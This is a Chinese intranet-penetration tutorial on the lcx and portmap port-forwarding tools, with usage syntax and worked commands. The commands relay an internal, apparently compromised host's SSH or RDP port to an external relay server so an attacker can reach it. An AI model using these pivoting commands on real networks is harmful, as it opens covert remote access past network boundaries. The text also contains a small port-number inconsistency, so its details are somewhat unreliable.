[內網滲透]lcx端口轉發

0x01 簡介

lcx是一款端口轉發工具，有三個功能：

• 第一個功能將本地端口轉發到遠程主機某個端口上
• 第二個功能將本地端口轉發到本地另外一個端口上
• 第三個功能是進行監聽並進行轉發使用

Lcx使用的前提是在端口轉發的時候須要一臺公網服務器

Lcx程序多用於被控制計算機處於內網的時候，被控制機可能中了木馬程序，雖然可以進行控制，但仍是沒有使用遠程終端登陸到本機進行管理方便，所以在不少狀況下，都會千方百計在被控制計算機上開啓3389端口，而後經過lcx等進行端口轉發，進而在本地鏈接到被控制計算機的遠程終端並進行管理和使用。在沒有端口轉發的狀況下外網主機是不能直接鏈接內網主機的，可是lcx工具能夠將內網主機（出入內網主機的須要可以ping通互聯網）的某個端口抓發到外網的某個端口上面，這樣的話處於外網的主機能夠將映射到外網的端口再反彈到另外一個外網的端口上面（用的最多的是3389），這樣咱們就能夠直接遠程鏈接反彈的端口就能夠與內網主機進行通訊。故內網已經打通，說實話lcx的工具如同在路由器上面作了端口轉發。

0x02 Linux下lcx使用方法

linux下的工具名稱爲portmap

Usage:./portmap -m method [-h1 host1] -p1 port1 [-h2 host2] -p2 port2 [-v] [-log filename]
-v: version
-h1: host1
-h2: host2
-p1: port1
-p2: port2
-log: log the data
-m: the action method for this tool
1: listen on PORT1 and connect to HOST2:PORT2
2: listen on PORT1 and PORT2
3: connect to HOST1:PORT1 and HOST2:PORT2

1.在外網中轉服務器上運行：

./portmap -m 2 -p1 6666 -h2 118.*.*.2 -p2 7777

將本地7777端口上的服務轉發到6666端口上

2.內網須要轉發的機器上運行:

./portmap -m 3 -h1 127.0.0.1 -p1 22 -h2 118.*.*.2 -p2 6666

將本地22端口轉發到外網機器上的6666端口

3.以上兩個步驟就已經作好了端口轉發，此時，咱們經過鏈接外網服務器的7777端口就能夠鏈接到那臺內網主機的22端口

0x03 Windows下lcx使用方法

Windows下的工具名稱爲lcx

Usage:lcx-<listen|tran|slave> <option> [-log logfile]

-tran <等待鏈接的端口> <目標ip> <目標端口>  (端口映射)

-listen <監聽slave請求的端口(對應slave 的第二個參數)> <等待鏈接的端口>  (端口轉發)

-slave <你的ip> <監聽端口(對應listen的第一個參數)> <目標ip> <目標端口>  (端口轉發)

1.在外網中轉服務器上運行：

lcx -listen 40050 10000

監聽本地40050端口，同時將數據轉發到10000端口

2.內網須要轉發的機器上運行:

lcx -slave 1.1.1.1 40050 10.10.0.3 3389

將本地的3389端口轉發到外網1.1.1.1的40050端口上

3.此時咱們經過鏈接外網服務器的10000端口就能夠鏈接到那臺內網主機的22端口

0x04 未完待續